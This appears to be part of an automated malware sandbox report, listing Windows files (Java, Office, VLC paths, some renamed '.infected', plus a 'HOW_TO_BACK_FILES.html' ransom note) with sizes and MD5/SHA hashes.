                                                                                                                              SHA256

                                                                                                                              e92465ca30da1ce7c312e0845fd6643de80196e6255c6c22e560e96b1de58607

                                                                                                                              SHA512

                                                                                                                              f4f740ce34862a3b0702b6f706511beed30882ae5b01fd581c9e2ca1c4abfe36f21bdea3ea3466a5199df00f7de6895eea3dd66c2965d9d3bdd1753977f83295

                                                                                                                              Download Submit

                                                                                                                            • C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA
                                                                                                                              Filesize

                                                                                                                              9KB

                                                                                                                              MD5

                                                                                                                              aa539b674c32f0029f814b729a8ef90f

                                                                                                                              SHA1

                                                                                                                              511e6253e4b3e72f3a0a378dd39e55bdbf0cfe4a

                                                                                                                              SHA256

                                                                                                                              043630cb420c156e886347c8888ff566ea06ae14ab3c8377b9b3a0b54e7cc410

                                                                                                                              SHA512

                                                                                                                              12e92e4cbfba2b5f2c08c96f726663b51ad62b3b3e6a5d8c12d3941921b7c38ae77b55fb0cdd6d596364c5541c88c95f1f59ebf4e926313fe9109d0ea9a59f5c

                                                                                                                              Download Submit

                                                                                                                            • C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF
                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              ad942aadd190d5f87a81dc0ebb425d5c

                                                                                                                              SHA1

                                                                                                                              5645c5fdaf20c48b96eee0101e5089f8533d4b23

                                                                                                                              SHA256

                                                                                                                              1f87f3ecf3a823be7cd79c0049097836cc015647bb6ab5a69280c15ffc4259e5

                                                                                                                              SHA512

                                                                                                                              85c3d92413a03b81b888db7c11f98db295f45371aae2ff81d7bfb2821170e330b3bc53cb133cb768c3a1dce2365f9ec3605830c5181398332ce58e401bdb6b79

                                                                                                                              Download Submit

                                                                                                                            • C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\org-netbeans-core-execution.xml_hidden
                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              81f75a6bafd5eef356465894b88da1e4

                                                                                                                              SHA1

                                                                                                                              cd9de4cb54cf65bd41e450a6f79b5b32dae5fe11

                                                                                                                              SHA256

                                                                                                                              91e3f9d00ee9eb35751befb48dd34407d8a59d0345ef85dfee63130318db0de1

                                                                                                                              SHA512

                                                                                                                              5112bf778b34b58bb9fb376e5acb689c1d509b7313952ea1b8f8a3dce522049ff1ac6cf3844569d74698ab8a1041bf36b98e49dadbdc18b4903f4819cac49114

                                                                                                                              Download Submit

                                                                                                                            • C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_CopyNoDrop32x32.gif.infected
                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              4561d109aa8086b9d1f74f0970230095

                                                                                                                              SHA1

                                                                                                                              088b57a3fa1a4b6c76d81f4692de523777813b21

                                                                                                                              SHA256

                                                                                                                              b1fa85695d305b5f72e82fc546430e199f9b965add31705e266f084a3d688f2a

                                                                                                                              SHA512

                                                                                                                              898b764254886f56fa203e92c1200218674e45f86571d7ad67a41fbf30f1b440994da0123e29f1d63ffe9fda0d9c81e3d0b5aa50f5d1451ca545dbb606b88c82

                                                                                                                              Download Submit

                                                                                                                            • C:\Program Files\Microsoft Office\root\Office16\1033\ClientOSub2019_eula.txt.infected
                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              4ac5e7732771e7b12f780a94863423fd

                                                                                                                              SHA1

                                                                                                                              aa78502d4f8522f55aaaa226fcb33f2b8b23a4cd

                                                                                                                              SHA256

                                                                                                                              656e1e8e0e37dffd0fa5496f13b3329510c4d69a981a0c1b9e93bdcf60351ee5

                                                                                                                              SHA512

                                                                                                                              fee9fc978414fba3a85eff78a2a60f305ec7c0ce085b871d9ccf54e666d2b61d1fd8faeb9496bfe8be081271d12d89f9b6f4d447b1928242f7565b782b238324

                                                                                                                              Download Submit

                                                                                                                            • C:\Program Files\Microsoft Office\root\Office16\1033\GRAPH_F_COL.HXK
                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              2e073ac53a2314755ea00e78b3fa2763

                                                                                                                              SHA1

                                                                                                                              bd48bf0a80a70c4ed0d2ec88a315df7f0b964ff3

                                                                                                                              SHA256

                                                                                                                              f3d1d5125c5a8f794dc5ae0cc1229d69dcef6861b490f61b1937da4f57bb2acd

                                                                                                                              SHA512

                                                                                                                              4d283bc2c8145d84de597733e2fccb579d0d51028f09b49061b5d75b68a76b5acc0767458248d8e35bfdf325bddc7fbed28a57f77f6f1c0f2df9284d68536f9b

                                                                                                                              Download Submit

                                                                                                                            • C:\Program Files\Microsoft Office\root\Office16\1033\MSOUC_K_COL.HXK
                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              ed47191157d21d3c844b9bdbb949f3ea

                                                                                                                              SHA1

                                                                                                                              b47ec4423063693d6af4fd44ffebef995da1865e

                                                                                                                              SHA256

                                                                                                                              2d234711e173873237c80142872c71fb805f9727ed68fe5a1a14bd062e95deb1

                                                                                                                              SHA512

                                                                                                                              db4d3814106e1da285ce319ffbe6bdede012978d3b64ff8729bb9241c028c969f304a61e8cb56dd7b9a12eb11e9f34b03ffc61d8d22780c6664d18cc9d407828

                                                                                                                              Download Submit

                                                                                                                            • C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe.config
                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              cf9b6b0ec15b730323e23b4054a0ae0d

                                                                                                                              SHA1

                                                                                                                              423ce19fe8e176e11fa5093556a365ec609faa4b

                                                                                                                              SHA256

                                                                                                                              0ace23bc9e265043709195e6acd77abd01d9334c0c25e0e3dcf9fad2037ac4df

                                                                                                                              SHA512

                                                                                                                              0451ebd1dfec4415e513887ddf05c7577246095d90605729bfb8164d86c8ee11d6601cb0a7fa248e7a6c3c9d4f2b7d385c50bf82e2655bbfe3d41c27bc0cd3b7

                                                                                                                              Download Submit

                                                                                                                            • C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\SIST02.XSL
                                                                                                                              Filesize

                                                                                                                              246KB

                                                                                                                              MD5

                                                                                                                              87f73a28d3a04f54daf361e764776bda

                                                                                                                              SHA1

                                                                                                                              d52485be9dd300cd5293e480cf8a5bd7942e0b43

                                                                                                                              SHA256

                                                                                                                              78f99c3155154052f3f2467a14542550dffaa1e028b1dc7505e62973e04a4cb5

                                                                                                                              SHA512

                                                                                                                              80dedcc3b71b67c276eb8f8710d496e64e1937de3aeded38a666a327111b9173209faff88aadc56ed525e40b739a6291954b22ebea30a359041756d1f6cdf657

                                                                                                                              Download Submit

                                                                                                                            • C:\Program Files\Microsoft Office\root\Office16\PROOF\msgr8fr.dub.infected
                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              6ad824473d09e175c531dc9875be522c

                                                                                                                              SHA1

                                                                                                                              93b9a532c95295e385c2dc9a17fb36f48af6092c

                                                                                                                              SHA256

                                                                                                                              955bdac0ab3eb391068cc2446095d694dd26b66f52f9147c0e92aa23d6b36acf

                                                                                                                              SHA512

                                                                                                                              1b88eae97a8906f1ecc14b010eda4907a0fc246cae0aeeda5554ed2994adf9097a39dc65a178d6b302ca34114454f720d5589924b819b8fd4adb679eca13f9a3

                                                                                                                              Download Submit

                                                                                                                            • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\osmdp64.msi
                                                                                                                              Filesize

                                                                                                                              2.4MB

                                                                                                                              MD5

                                                                                                                              e561ffaeaa34f8b31ba37ef1d7eebb9c

                                                                                                                              SHA1

                                                                                                                              247ce123ffe096e51700c9a732f2a94357a8afb7

                                                                                                                              SHA256

                                                                                                                              f4fc6409b91f149f0e9b10082e1bd26f14664d4cce0b661581edf4f5900521ef

                                                                                                                              SHA512

                                                                                                                              e38896eae49db6a549066fdcbbd3299688bfd3412ba9f0d3f9e976856038f2eda92140544a85dd68bf255ca42726c1b3985fe9606a65a84a484e08350b90e201

                                                                                                                              Download Submit

                                                                                                                            • C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo
                                                                                                                              Filesize

                                                                                                                              609KB

                                                                                                                              MD5

                                                                                                                              669b3d340709b21e3bd793ffe3ba5458

                                                                                                                              SHA1

                                                                                                                              82db99cc8b6c2b556b3167b6e8d9015dc24a863e

                                                                                                                              SHA256

                                                                                                                              a02f53728436b57056c675b283e7af40191067ad83b6ac5362cf2ffb0c80730b

                                                                                                                              SHA512

                                                                                                                              74f9dd6f898273f9c40ad0ea5d7e8473c0792221c750ccd82a51e7657adfd0a9776d463c288f4815690a8fa5225aee8aa57fdcb208bc940e9587c3c1ded9ec9b

                                                                                                                              Download Submit

                                                                                                                            • C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo
                                                                                                                              Filesize

                                                                                                                              785KB

                                                                                                                              MD5

                                                                                                                              21a50a201e4cde6353f7d43f27b7a9d1

                                                                                                                              SHA1

                                                                                                                              b1e362b0f7044cfa5ae8e264f6e1c6514b329c1e

                                                                                                                              SHA256

                                                                                                                              b9e2cb4ec22edf971bd67f8cd37609b4194cd52f26d2a364831f8fbda2f52e53

                                                                                                                              SHA512

                                                                                                                              26a05a3fd228c680fdd978aede5982b24642b1fb8305424937cc42cf30b571e0031ecb398692055501899e369614e44f97f7b5bd98856e01069311045f1bbe35

                                                                                                                              Download Submit

                                                                                                                            • C:\odt\HOW_TO_BACK_FILES.html
                                                                                                                              Filesize

                                                                                                                              3KB

                                                                                                                              MD5

                                                                                                                              a8514fd9f3a52ab2a00f57494d03b2fe

                                                                                                                              SHA1

                                                                                                                              0e204aabbd8b5d6ee1b36d10429d65eb436afd14

                                                                                                                              SHA256

                                                                                                                              056ae301d1686bbf2355fd96ef3363e2b18d593f58f912498d87de3569fa9028

                                                                                                                              SHA512

                                                                                                                              6250481712b51d19e13bf148e3cb046fbf669398b06f8ce757a8583a0fec36ca22140cb90d4706a731f27d1419795ff37ec079d170e15e9e2985020c1e6a1d5b

                                                                                                                              Download Submit